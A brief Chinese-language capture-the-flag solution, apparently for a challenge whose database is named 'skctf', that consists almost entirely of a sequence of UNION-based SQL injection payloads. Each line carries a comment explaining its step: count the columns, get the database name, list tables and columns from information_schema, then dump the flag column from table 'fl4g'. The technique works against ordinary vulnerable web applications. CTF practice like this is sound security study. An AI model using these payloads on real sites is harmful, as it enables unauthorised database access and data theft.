打开网站抓包,直接开整
-1’ union select 1,2,3,4 – //四列
-1’ union select 1,2,3,database() – //得出数据库
-1’ union select 1,2,3,(select group_concat(table_name) from information_schema.tables wheretable_schema=‘skctf’) – //得出表
id=-94’ union select 1,2,3,(select group_concat(column_name) from information_schema.columns where table_name=‘fl4g’) – //得出表的字段
-94’ union select 1,2,3,(select group_concat(skctf_flag) from fl4g) – //得出flag